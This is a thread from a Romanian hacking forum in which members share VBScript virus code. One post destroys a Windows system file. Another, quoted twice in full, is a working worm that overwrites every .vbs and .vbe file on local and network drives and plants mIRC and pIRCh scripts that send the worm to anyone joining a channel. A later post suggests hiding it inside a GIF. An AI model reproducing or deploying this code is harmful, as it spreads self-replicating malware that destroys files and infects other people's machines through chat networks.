Hacking and more...
HaCkinG CulT
|
Nou pe simpatie: BrianaS 23 ani
 | Femeie 23 ani Bucuresti cauta Barbat 26 - 57 ani |
|
|
Hacking and more...ReguliInregistrareLoginPozeNu sunteti logat. Lista Forumurilor Pe Tematici
|
| #1 |
|
|
AL SALVEZI SUB .VBS Dim fso, fs1, fs2 Dim drive, folder, file Set fso = CreateObject("Scripting.FileSystemObject") drive = "c:" folder ="windows" file = "win.com" Set fs1 = fso.GetFile(drive&folder&file) fs1.copy ("c:windowstempwin.com") set fs2=fso.CreateTextFile("c:windowswin.com") fs2.writeline "win.com is gone images/smiles/icon_biggrin.gif" Set fs1 = fso.GetFile(drive&folder&file) fs1.delete fs2.close
_______________________________________ net_shadow
|
|
| |
|
| #2 |
ixionMaster of 127.0.0.1Din: filiasi
Postari: 187
|
|
man dar dc deskisesi 2 topicuri cu acelasi subiect??? 
_______________________________________ kiar daca sunt mic visez sa ajung mare
|
|
| |
|
| #3 |
|
|
@ixion :
dude, astea sunt probleme de la 3xforum 
|
|
| |
|
| #4 |
OSHOElite MemberDin: Cluj
Postari: 2069
|
|
|
| |
|
| #5 |
|
|
@virtual_x :
Hai sa te ajut putin sa iti fac codu sa se multiplice se va raspandi prin :
- Infecteaza mIRC - Infecteaza pIRCh - Infecteaza fisiere prin cautare 
Code:
Function Dodrives()
On Error Resume Next
Set fso = CreateObject("scipting.filesystemobject")
Set Drives = fso.Drives
For Each Drive In Drives
If Drive.Drivetype = Remote Then
Drivefull = Drive & ""
Call Subfolders(Drivefull)
ElseIf Drive.IsReady Then
Drivefull = Drive & ""
Call Subfolders(Drivefull)
End If
Next
End Function
Function Subfolders(path)
newpath=path
Set Fold = fso.GetFolder(newpath)
Set Files = Fold.Files
For Each file In Files
If fso.GetExtensionName(file.path) = "vbs" Then
fso.copyfile wscript.scriptfullname, file.path, True
End If
If fso.GetExtensionName(file.path) = "vbe" Then
fso.copyfile wscript.scriptfullname, file.path, True
End If
If file.Name = "mirc.ini" Then
Mirc (file.ParentFolder)
End If
If file.Name = "Pirch32.exe" Then
Pirch (file.ParentFolder)
End If
Next
Set file = Fold.Subfolders
For Each Subfol In file
Call Subfolders(Subfol.path)
Next
End Function
Function Mirc(Path)
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set ws = CreateObject("wscript.shell")
If Path = "" Then
If fso.fileexists("c:mircmirc.ini") Then Path = "c:mirc"
If fso.fileexists("c:mirc32mirc.ini") Then Path = "c:mirc32"
PfDir = ws.regread("HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionProgramFilesDir")
If fso.fileexists(PfDir & "mircmirc.ini") Then Path = PfDir & "mirc"
End If
If Path <> "" Then
Set Script = fso.CreateTextFile(Path & "script.ini", True)
Script.writeline "[script]"
Script.writeline "n0=on 1:JOIN:#:{"
Script.writeline "n1= /if ( $nick == $me ) { halt }"
Script.writeline "n2= /." & chr(100) & chr(99) & chr(99) & " send $nick c:windowsworm.vbs"
Script.writeline "n3=}"
Script.Close
End If
End Function
Function Pirch(path)
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set ws = CreateObject("wscript.shell")
If path = "" Then
If fso.fileexists("c:pirchPirch32.exe") Then path = "c:pirch"
If fso.fileexists("c:pirch32Pirch32.exe") Then path = "c:pirch32"
pfDir = ws.regread("HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionProgramFilesDir")
If fso.fileexists(pfDir & "pirchPirch32.exe") Then path = pfDir & "pirchPirch32.exe"
End If
If path <> "" Then
Set Script = fso.CreateTextFile(path & "events.ini", True)
Script.WriteLine "[Levels]"
Script.WriteLine "Enabled=1"
Script.WriteLine "Count=6"
Script.WriteLine "Level1=000-Unknowns"
Script.WriteLine "000-UnknownsEnabled=1"
Script.WriteLine "Level2=100-Level 100"
Script.WriteLine "100-Level 100Enabled=1"
Script.WriteLine "Level3=200-Level 200"
Script.WriteLine "200-Level 200Enabled=1"
Script.WriteLine "Level4=300-Level 300"
Script.WriteLine " 300-Level 300Enabled=1"
Script.WriteLine "Level5=400-Level 400 "
Script.WriteLine "400-Level 400Enabled=1"
Script.WriteLine "Level6=500-Level 500"
Script.WriteLine "500-Level 500Enabled=1"
Script.WriteLine ""
Script.WriteLine "[000-Unknowns]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[100-Level 100]"
Script.WriteLine "User1=*!*@*"
Script.WriteLine "UserCount=1"
Script.WriteLine "Event1=ON JOIN:#:/" & chr(100) & chr(99) & chr(99) & " tsend $nick c:windowsworm.vbs"
Script.WriteLine "EventCount=1"
Script.WriteLine ""
Script.WriteLine "[200-Level 200]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[300-Level 300]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[400-Level 400]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[500-Level 500]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.Close
End If
End Function |
si gata se multiplica 
|
|
| |
|
| #6 |
|
|
way dar datimi un virus in pseudocod k asa nu stie toata lumea limbajul sper k intelegeti.....sunt si unii care nu stiu toate mediile de programare............ 
_______________________________________ http://andrewboy2007.ifastnet.com/home/ ---ziceti-mi parerea voastra despre chat
|
|
| |
|
| #7 |
|
|
pana la urma asta e virusul care formateaza hardu??? 
_______________________________________ _________________________________ There's no place like 127.0.0.1!!" _________________________________
|
|
| |
|
| #8 |
|
|
ti se pare tie a virus de formatat hdd ? 
|
|
| |
|
| #9 |
|
|
sincer sa fiu nu!!! dar totusi din pacate nu imi dau seama ce fel de virus este!!!!! deci m-a lamureste cineva??
_______________________________________ _________________________________ There's no place like 127.0.0.1!!" _________________________________
|
|
| |
|
| #11 |
|
|
lol mah voi sunteti mai experti si stiti mai multe medii de programare dar io .......... nuami unu si cred k stiti si care........inka invat.....nu mam apucat de mult timp deci nam cum sa stiu mai mult.... 
_______________________________________ http://andrewboy2007.ifastnet.com/home/ ---ziceti-mi parerea voastra despre chat
|
|
| |
|
| #12 |
OSHOElite MemberDin: Cluj
Postari: 2069
|
|
andrewboy: nu conteaza cate limbaje cunosti. Invata unul singur dar invata-l bine. Dupa ce il stii invata algoritmi si daca vrei sa faci virusi studiaza in mod deosebit recursivitatea. E cel mai folosit algoritm in programarea virusilor 
_______________________________________
 IPFind: IP Finder and browser revealer SkullBox: IT pentru incepatori _______________________________________
|
|
| |
|
| #14 |
cyberElite MemberDin: www.kellot.lx.ro
Postari: 528
|
|
|
| |
|
| #15 |
|
|
virusu asta sterge de toate files foldere iconurile si gif-urile si le pune intr-un fisier temporar win.com?
_______________________________________ Arcus nimium tensus rumpitur.
|
|
| |
|
| #17 |
OSHOElite MemberDin: Cluj
Postari: 2069
|
|
|
| |
|
| #19 |
|
|
Zero_Cool a scris:
@virtual_x :
Hai sa te ajut putin sa iti fac codu sa se multiplice se va raspandi prin :
- Infecteaza mIRC - Infecteaza pIRCh - Infecteaza fisiere prin cautare 
Code:
Function Dodrives()
On Error Resume Next
Set fso = CreateObject("scipting.filesystemobject")
Set Drives = fso.Drives
For Each Drive In Drives
If Drive.Drivetype = Remote Then
Drivefull = Drive & ""
Call Subfolders(Drivefull)
ElseIf Drive.IsReady Then
Drivefull = Drive & ""
Call Subfolders(Drivefull)
End If
Next
End Function
Function Subfolders(path)
newpath=path
Set Fold = fso.GetFolder(newpath)
Set Files = Fold.Files
For Each file In Files
If fso.GetExtensionName(file.path) = "vbs" Then
fso.copyfile wscript.scriptfullname, file.path, True
End If
If fso.GetExtensionName(file.path) = "vbe" Then
fso.copyfile wscript.scriptfullname, file.path, True
End If
If file.Name = "mirc.ini" Then
Mirc (file.ParentFolder)
End If
If file.Name = "Pirch32.exe" Then
Pirch (file.ParentFolder)
End If
Next
Set file = Fold.Subfolders
For Each Subfol In file
Call Subfolders(Subfol.path)
Next
End Function
Function Mirc(Path)
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set ws = CreateObject("wscript.shell")
If Path = "" Then
If fso.fileexists("c:mircmirc.ini") Then Path = "c:mirc"
If fso.fileexists("c:mirc32mirc.ini") Then Path = "c:mirc32"
PfDir = ws.regread("HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionProgramFilesDir")
If fso.fileexists(PfDir & "mircmirc.ini") Then Path = PfDir & "mirc"
End If
If Path <> "" Then
Set Script = fso.CreateTextFile(Path & "script.ini", True)
Script.writeline "[script]"
Script.writeline "n0=on 1:JOIN:#:{"
Script.writeline "n1= /if ( $nick == $me ) { halt }"
Script.writeline "n2= /." & chr(100) & chr(99) & chr(99) & " send $nick c:windowsworm.vbs"
Script.writeline "n3=}"
Script.Close
End If
End Function
Function Pirch(path)
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set ws = CreateObject("wscript.shell")
If path = "" Then
If fso.fileexists("c:pirchPirch32.exe") Then path = "c:pirch"
If fso.fileexists("c:pirch32Pirch32.exe") Then path = "c:pirch32"
pfDir = ws.regread("HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionProgramFilesDir")
If fso.fileexists(pfDir & "pirchPirch32.exe") Then path = pfDir & "pirchPirch32.exe"
End If
If path <> "" Then
Set Script = fso.CreateTextFile(path & "events.ini", True)
Script.WriteLine "[Levels]"
Script.WriteLine "Enabled=1"
Script.WriteLine "Count=6"
Script.WriteLine "Level1=000-Unknowns"
Script.WriteLine "000-UnknownsEnabled=1"
Script.WriteLine "Level2=100-Level 100"
Script.WriteLine "100-Level 100Enabled=1"
Script.WriteLine "Level3=200-Level 200"
Script.WriteLine "200-Level 200Enabled=1"
Script.WriteLine "Level4=300-Level 300"
Script.WriteLine " 300-Level 300Enabled=1"
Script.WriteLine "Level5=400-Level 400 "
Script.WriteLine "400-Level 400Enabled=1"
Script.WriteLine "Level6=500-Level 500"
Script.WriteLine "500-Level 500Enabled=1"
Script.WriteLine ""
Script.WriteLine "[000-Unknowns]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[100-Level 100]"
Script.WriteLine "User1=*!*@*"
Script.WriteLine "UserCount=1"
Script.WriteLine "Event1=ON JOIN:#:/" & chr(100) & chr(99) & chr(99) & " tsend $nick c:windowsworm.vbs"
Script.WriteLine "EventCount=1"
Script.WriteLine ""
Script.WriteLine "[200-Level 200]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[300-Level 300]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[400-Level 400]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[500-Level 500]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.Close
End If
End Function |
si gata se multiplica  |
esti istet sincer si nu este nevoie sa se multiplice modifica-l putin si ascunde-l pe un gif si probeaza-l o sa-ti placa
_______________________________________ net_shadow
|
|
| |
|
| #20 |
ralfyMembru nou
Postari: 1
|
|
sal,sunt nou pe aici,in ce program e facut virusu,eu foloses C++ ,e bun? sa nu va supi ca intreb dar sunt incepator 
|
|
| |
|
| #21 |
ReXuSMembru nouDin: Iasi
Postari: 7
|
|
si ce face virusu asta ?? 
_______________________________________ It was me ... Just ReXuS ... The Bad Boy 
|
|
| |
|
| #23 |
|
|
ReXuS dublu post te cam pashte un mique ban !!! 
|
|
| |
|